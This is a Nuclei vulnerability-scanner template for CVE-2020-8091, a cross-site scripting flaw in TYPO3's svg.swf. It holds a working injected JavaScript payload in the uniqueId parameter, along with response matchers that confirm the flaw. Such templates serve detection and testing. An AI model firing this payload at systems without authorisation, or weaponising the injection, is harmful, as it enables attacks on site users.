nuclei-templates/cves/2020/CVE-2020-8091.yaml

25 lines
553 B
YAML

id: CVE-2020-8091
info:
name: TYPO3 Cross-Site Scripting Vulnerability
author: dwisiswant0
severity: medium
tags: cve,cve2020,xss
requests:
- method: GET
path:
- "{{BaseURL}}/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(31337),this.x=1}//"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "31337"
part: body
- type: word
words:
- "application/x-shockwave-flash"
part: header